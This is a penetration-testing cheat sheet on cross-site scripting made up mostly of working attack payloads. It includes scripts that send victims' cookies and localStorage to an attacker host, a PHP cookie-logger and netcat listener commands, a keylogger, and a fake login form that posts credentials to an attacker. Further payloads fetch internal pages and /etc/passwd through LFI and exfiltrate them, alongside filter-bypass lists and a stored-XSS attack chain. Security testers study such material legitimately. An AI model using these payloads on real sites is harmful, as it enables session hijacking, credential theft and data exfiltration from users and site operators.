Testing for XSS

XSS Types

Type

Description

Stored (Persistent)

Input stored in DB, displayed to all users (most critical)

Reflected (Non-Persistent)

Input reflected in response (e.g., search, error messages)

DOM-based

Processed client-side via JavaScript, never reaches server

Test ALL Input Fields

IMPORTANT: Always test XSS payloads in ALL input fields, not just the obvious ones. Some fields may have different (or no) filtering.

Fields to Test

Username/login fields
Message/comment body
Phone number - Often unfiltered, expecting only digits
Email address - May allow special characters
Subject/title fields
Search boxes
Hidden form fields
File name fields
Contact form fields (name, company, etc.)

Example: Phone Field XSS

A contact form may filter the message body for XSS but leave the phone number field completely unfiltered:

<!-- Filtered in message field -->
<script>alert(1)</script>
<!-- Returns: "Oops! Someone is trying to do something nasty..." -->

<!-- Unfiltered in phone field -->
<script>var i=new Image; i.src="http://ATTACKER/steal.php?c="+document.cookie;</script>
<!-- Works! Cookie sent to attacker -->

Tip: If one field is filtered, try the same payload in every other field. Developers often focus filtering on expected attack surfaces and miss unexpected ones.

Test Payloads

Basic Test

<script>alert(window.origin)</script>

Alternatives (if alert blocked)

<script>confirm(1)</script>
<script>prompt(1)</script>
<script><img src=x onerror=confirm(1)></script>
<script><img src=x onerror=prompt(1)></script>

DOM XSS (when script tags blocked)

<script><img src="" onerror=alert(window.origin)></script>

XSS Discovery Tools

# XSS Strike
git clone https://github.com/s0md3v/XSStrike.git
cd XSStrike
pip install -r requirements.txt
python xsstrike.py -u "http://TARGET/page.php?param=test"

# Other tools
# - Brute XSS: https://github.com/rajeshmajumdar/BruteXSS
# - XSSer: https://github.com/epsylon/xsser

Reflected XSS Exploitation

Find reflected parameter (check Network tab for GET/POST)
Inject payload in URL parameter
Send malicious URL to victim:

http://TARGET/search.php?q=<script>alert(1)</script>

DOM XSS - Source & Sink

Common Sources (user input)

document.URL
document.location
document.referrer
window.location
location.search
location.hash

Dangerous Sinks (vulnerable functions)

// JavaScript
document.write()
document.innerHTML
document.outerHTML

// jQuery
html()
append()
after()
add()

Stored XSS

Key Logger

<script type="text/javascript">
 let l = ""; // Variable to store key-strokes in
 document.onkeypress = function (e) { // Event to listen for key presses
   l += e.key; // If user types, log it to the l variable
   console.log(l); // update this line to post to your own server
 }
</script>

Chat Room XSS

Start a netcat listener on your attack box

nc -nlvp 4444

Take this XSS payload and paste it in the chat room and submit:

<script>window.location='http://10.13.**.**:4444/?cookie='+document.cookie</script>

Note: Send the payload and then open the listener

Stored XSS Payloads

Stored XSS pop up to display your cookies, good for a POC

<script>alert(document.cookie)</script>

Adding HTML to a website

<title>Example document: XSS Doc</title>

Deface website title. You will need inspect element and find the name of the element you want to change. thm-title is the element name in this example.

<script>document.getElementById('thm-title').innerHTML="I am a hacker"</script>

DOM-Based XSS

Internal Network Scanner

<script>
for (let i = 0; i < 256; i++) {
  let ip = '192.168.0.' + i
  let code = '<img src="http://' + ip + '/favicon.ico" onload="this.onerror=null; this.src=/log/' + ip + '">'
  document.body.innerHTML += code
}
</script>

Website Defacing

Change Background

<script>document.body.style.background = "#141d2b"</script>
<script>document.body.background = "http://ATTACKER/image.jpg"</script>

Change Title

<script>document.title = 'Hacked'</script>

Replace Page Content

<script>document.getElementsByTagName('body')[0].innerHTML = '<h1>Hacked</h1>'</script>

Remove Element

document.getElementById('elementId').remove();

XSS Phishing

document.write('<h3>Please login to continue</h3><form action=http://ATTACKER_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('originalForm').remove();

Comment Out Remaining HTML

...PAYLOAD... <!--

// Redirect method
<script>document.location='http://ATTACKER_IP/steal.php?c='+document.cookie;</script>

// Image method (stealthier)
<script>new Image().src='http://ATTACKER_IP/steal.php?c='+document.cookie;<script>

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Start Listener

# Simple netcat
sudo nc -lvnp 80

# PHP server (better - handles HTTP properly)
mkdir /tmp/tmpserver && cd /tmp/tmpserver
# create steal.php with above code
sudo php -S 0.0.0.0:80

Blind XSS Detection

Remote Script Loading (per field)

<script src=http://ATTACKER_IP/fullname></script>
<script src=http://ATTACKER_IP/username></script>
<script src=http://ATTACKER_IP/email></script>

Blind XSS Payloads

<script src=http://ATTACKER_IP></script>
'><script src=http://ATTACKER_IP></script>
"><script src=http://ATTACKER_IP></script>
<script>$.getScript("http://ATTACKER_IP")</script>

<script>new Image().src='http://ATTACKER_IP/steal.php?c='+document.cookie</script>

Common Injection Contexts

Context

Payload

Inside <script>

';alert(1)// or ";alert(1)//

HTML attribute

" onmouseover=alert(1)

HTML tag

<img src=x onerror=alert(1)>

URL parameter

javascript:alert(1)

Event handler

'-alert(1)-'

Bypass Techniques

Case Variation

<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x onerror=alert(1)>

Encoding

<script>eval(atob('YWxlcnQoMSk='))</script>

No Parentheses

<script>alert`1`</script>
<script><img src=x onerror=alert`1`></script>

No Quotes

<script>alert(String.fromCharCode(88,83,83))</script>

Filter Bypass Payloads

<svg onload=alert(1)>
<body onload=alert(1)>
<input onfocus=alert(1) autofocus>
<marquee onstart=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>

XSS in Markdown

Markdown parsers that allow HTML can be vulnerable to XSS.

Markdown XSS Payloads

[Click me](javascript:alert(1))
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

Embedded HTML in Markdown

### Title
<script>alert(1)</script>

### Image payload
<img src=x onerror=alert(1)>

Reference: https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt

XSS Data Exfiltration via fetch()

Exfiltrate internal page content when no cookies are available.

Exfiltrate Page Content

<script>
fetch('http://TARGET/internal-page.php')
.then(resp => resp.text())
.then(body => {
    fetch("http://ATTACKER_IP/exfil?body=" + btoa(body));
})
</script>

Exfiltrate via LFI Parameter

If the target has an LFI vulnerability accessible from XSS context:

<script>
fetch('http://TARGET/messages.php?file=../../../../etc/passwd')
.then(resp => resp.text())
.then(body => {
    fetch("http://ATTACKER_IP/exfil?body=" + btoa(body));
})
</script>

Decode Exfiltrated Data

# Listener receives base64 encoded data
# GET /exfil?body=PHByZT5hbGJlcnQ6JGFwcjEk...

# Decode
echo "PHByZT5hbGJlcnQ6JGFwcjEk..." | base64 -d

Attack Flow (Stored XSS + LFI Chain)

Upload malicious markdown/content with XSS payload
Get shareable link to stored content
Send link to admin via contact form
Admin views link, XSS executes
Fetch internal page content (messages, config files)
Exfiltrate via base64 to attacker server
Chain with LFI to read sensitive files (Apache config, .htpasswd)

Exfiltrate localStorage

<script>
new Image().src='http://ATTACKER_IP/steal.php?c='+btoa(JSON.stringify(localStorage));
</script>

PreviousTesting for SQL NextXXE Injection

Last updated 10 days ago

hashtagXSS Types

hashtagTest ALL Input Fields

hashtagFields to Test

hashtagExample: Phone Field XSS

hashtagTest Payloads

hashtagBasic Test

hashtagAlternatives (if alert blocked)

hashtagDOM XSS (when script tags blocked)

hashtagXSS Discovery Tools

hashtagReflected XSS Exploitation

hashtagDOM XSS - Source & Sink

hashtagCommon Sources (user input)

hashtagDangerous Sinks (vulnerable functions)

hashtagStored XSS

hashtagKey Logger

hashtagChat Room XSS

hashtagStored XSS Payloads

hashtagDOM-Based XSS

hashtagInternal Network Scanner

hashtagWebsite Defacing

hashtagChange Background

hashtagChange Title

hashtagReplace Page Content

hashtagRemove Element

hashtagXSS Phishing

hashtagInject Login Form

hashtagComment Out Remaining HTML

hashtagSession Hijacking / Cookie Stealing

hashtagCookie Stealing Payloads

hashtagPHP Cookie Logger (steal.php)

hashtagStart Listener

hashtagBlind XSS Detection

hashtagRemote Script Loading (per field)

hashtagBlind XSS Payloads

hashtagscript.js for Cookie Stealing

hashtagCommon Injection Contexts

hashtagBypass Techniques

hashtagCase Variation

hashtagEncoding

hashtagNo Parentheses

hashtagNo Quotes

hashtagFilter Bypass Payloads

hashtagXSS in Markdown

hashtagMarkdown XSS Payloads

hashtagEmbedded HTML in Markdown

hashtagXSS Data Exfiltration via fetch()

hashtagExfiltrate Page Content

hashtagExfiltrate via LFI Parameter

hashtagDecode Exfiltrated Data

hashtagAttack Flow (Stored XSS + LFI Chain)

hashtagExfiltrate localStorage